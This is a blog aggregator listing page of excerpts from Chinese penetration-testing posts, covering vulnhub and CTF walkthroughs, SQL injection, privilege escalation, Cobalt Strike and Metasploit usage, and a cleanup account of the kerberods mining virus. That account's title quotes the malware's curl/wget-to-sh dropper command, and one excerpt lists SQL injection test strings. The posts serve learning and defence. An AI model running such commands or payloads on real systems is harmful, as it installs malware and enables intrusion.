1

kali渗透综合靶机(十七)--HackInOS靶机

kali渗透综合靶机(十七)--HackInOS靶机 靶机下载地址:https://www.vulnhub.com/hackinos/HackInOS.ova 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二、端口扫描 1. masscan --ra ...

雨中落叶 发布于 2019-06-21 13:55 评论(0)阅读(260)
0

Kali Linux Web渗透测试手册(第二版) - 1.1 - Firefox浏览器下安装一些常用的插件

一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: l 在Windows和Linux上安装VirtualBox l 创建一个Kali Linux虚拟机 l 更新和升级Kali Linux l 为渗透测试配置web浏览器(即在Firefox浏览器下安装一些常用的插件) l 创建 ...

xyongsec 发布于 2019-06-21 13:49 评论(0)阅读(67)
0

sql回显注入(满满的干货)

三种注入poc where user_id = 1 or 1=1 where user_id = '1' or '1'='1' where user_id =" 1 "or "1"="1" 三种sql注释符 # 单行注释 注意与url中的#区分,常编码为%23 --空格 单行注释 注意为短线短线空格 ...

十三s 发布于 2019-06-19 21:50 评论(0)阅读(138)
0

CTF中对web服务器各种提权姿势

在我们拿下服务器web服务往往只是低权限用户,对于内网渗透,我们往往需要root权限,Linux系统提权包括使用溢出漏洞已及利用系统配置文件。 提权前提: 1.拿到低权限shell 2.被入侵机器上有nc,python,perl等常见linux下的工具 3.有权上传下载文件 1. 利用内核漏洞通杀内 ...

Wings_shadow 发布于 2019-06-19 19:58 评论(0)阅读(277)
0

cobaltr strike入门使用教程-1

前言 Cobalt Strike分为服务端和客户端两个部分从而实现分布式操作,协同作战。工具有linux和windows版本。 1.创建服务端 找到解压目录进入 ./teamserver [IP] [password] 2.创建客户端 运行cobaltstrike,在host字段输入ip,user字 ...

不靠谱的谱 发布于 2019-06-18 12:34 评论(0)阅读(165)
0

介绍一些搜索引擎语法()

首先是百度和谷歌都拥有的高级搜索功能 这里以百度为例,打开百度 ,右上角设置,高级搜索 site: 搜索特定的站点信息 inurl: 搜索url中包含特定字符串的网址 intitle: 搜索网页标题中包含特定字符串的网址 intext: 搜索站点页面中具有关键字内容的网址 filetype: 搜索特 ...

十三s 发布于 2019-06-17 21:24 评论(0)阅读(90)
0

SQLmap命令详解

SQLmap命令详解 来源于网络,侵权请通知我删除, 请不要转载 Options(选项): version 显示程序的版本号并退出 h, help 显示此帮助消息并退出 v VERBOSE 详细级别:0 6(默认为 1) Target(目标): 以下至少需要设置其中一个选项,设置目标 URL 。 d ...

一二一。。 发布于 2019-06-16 18:01 评论(0)阅读(69)
0

Mysql基本注入

实验环境:墨者学院Mysql手工注入漏洞测试靶场 后台源码没有进行任何字符过滤。 首先进入靶场环境 先用 登陆试试 果然不行,这时看到用户登录下方有一个停机维护通知,点进去瞅瞅 看到这里链接上有 ,怀疑这里会有注入点。 判断注入点 先简单判断是不是字符型注入点,使用单引号闭合语句,注释后面的语句 发 ...

顾北清 发布于 2019-06-14 22:47 评论(0)阅读(93)
1

Linux服务器感染kerberods病毒 | 挖矿病毒查杀及分析 | (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh)

最近公司两台服务器感染挖矿病毒,占用大量CPU资源,花费两天时间杀毒,并记录下这两天的辛酸历程~ ...

小飞飞俠 发布于 2019-06-14 17:45 评论(0)阅读(4092)
0

利用QQ获取ip

首先启动任务管理器,选择性能选型,点击打开资源管理器 点击网络,找到qq.exe 点击下面的TCP链接 最好让你的qq好友发一个离线文件,在接收的时候注意远程连接,即使您所要的你好友的ip地址 ...

Geeksongs 发布于 2019-06-14 00:13 评论(0)阅读(114)
1

kali渗透综合靶机(十六)--evilscience靶机

kali渗透综合靶机(十六)--evilscience靶机 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.195 三、端口服务识别 1. nmap ...

雨中落叶 发布于 2019-06-13 14:12 评论(0)阅读(146)
0

【转载】VMware Workstation网络说明

1、什么是bridged(桥接模式)?答:在这种模式下,使用VMnet0虚拟交换机,虚拟操作系统就像是局域网中的一台独立的主机,与宿主计算机一样,它可以访问网内任何一台机器。在桥接模式下,可以手工配置它的TCP/IP配置信息(IP、子网掩码等,而且还要和宿主机器处于同一网段),以实现通过局域网的网关 ...

zinuo 发布于 2019-06-13 00:06 评论(0)阅读(64)
0

如何申请阿里云免费SSL证书(可用于https网站)并下载下来

前提条件:你要有阿里云的账号,并且要有一个域名。 注意:阿里云系统也在不断更新,界面以后可能会有稍许变化,但是原理是相通的。 具体步骤: 1.登录到阿里云后台,并选择 “SSL证书(应用安全)” 菜单 2.点击购买证书按钮 3.选择免费型DV SSL,Symantec,点击立即购买按钮。 (这里需要 ...

爱自律 发布于 2019-06-12 20:20 评论(0)阅读(172)
0

攻防世界Web新手练习区(1-6)

第一题 view_source 获取在线场景查看网页 打开页面之后首先考虑查看源代码,发现不能右击 根据题目的提示考虑使用view source查看源代码,发现flag 第二题 get_post 获取在线场景查看网页 先使用GET方式提交a=1 提交完成之后出现了第二个要求,以POST方式提交b=2 ...

顾北清 发布于 2019-06-11 13:03 评论(0)阅读(739)
0

kali渗透综合靶机(十五)--Breach-1.0靶机

kali渗透综合靶机(十五)--Breach-1.0靶机 靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 一、主机发现 1.netdiscover -i eth0 -r 192.168.110.0/24 二、端口扫描 1. mass ...

雨中落叶 发布于 2019-06-09 22:51 评论(1)阅读(344)
1

记录一次【模仿真实环境】的内网漫游

一阶段、 信息收集: 通过NMAP进行端口扫描 发现网站开放了80,443,700,8080端口 80端口下存在web服务 :Foosun DotNetCMS 2.0 网站为IIS搭建的aspx站 服务器操作系统为win2008 8080端口下存在路由登录界面 二、web渗透、 浏览网站发现网站使用 ...

那酒不要留 发布于 2019-06-09 20:05 评论(0)阅读(67)
0

内网漫游-模拟真实环境【二】

上篇讲到了我们已经拿到了内网192.168.1.123服务器 拿到192.168.1.123服务器后 要进行内网漫游 需要挂代理 当我们使用菜刀进行信息收集时,发现权限不够,这里就需要提权了 同时发现192.168.1.123开放了3389,445端口,我们可以使用溢出进行提权 这里对挂代理 提权及 ...

Shadow-G 发布于 2019-06-09 17:58 评论(0)阅读(82)
0

内网漫游-模拟真实环境【一】

声明:本篇文章测试网络环境为内网搭建靶场测试 先了解一下网络结构图(结构图为测试后绘制) 关于10段的FTP因时间关系没有继续进行探测 信息收集: 通过NMAP进行端口扫描 发现网站开放了80,443,700,8080端口 80端口下存在web服务 :Foosun DotNetCMS 2.0 网站为 ...

Shadow-G 发布于 2019-06-09 17:03 评论(0)阅读(320)
0

Shodan全世界在线设备搜索引擎

reproduction from https://danielmiessler.com/study/shodan/ What is Shodan? Shodan is a search engine for finding specific devices, and device types, t ...

有理想的coder 发布于 2019-06-07 18:55 评论(0)阅读(50)
0

Metasploit工具的使用

如果有代理在前面加proxychains msfconsole 进入MSF终端search xxx xxx为要搜索的模块use xxxx 选择要用的攻击模块show options 查看相关设置set LHOST 本机IPset RHOST 目标IPset 。。。。。。。 配置exoloit/run ...

Shadow-G 发布于 2019-06-06 18:13 评论(0)阅读(62)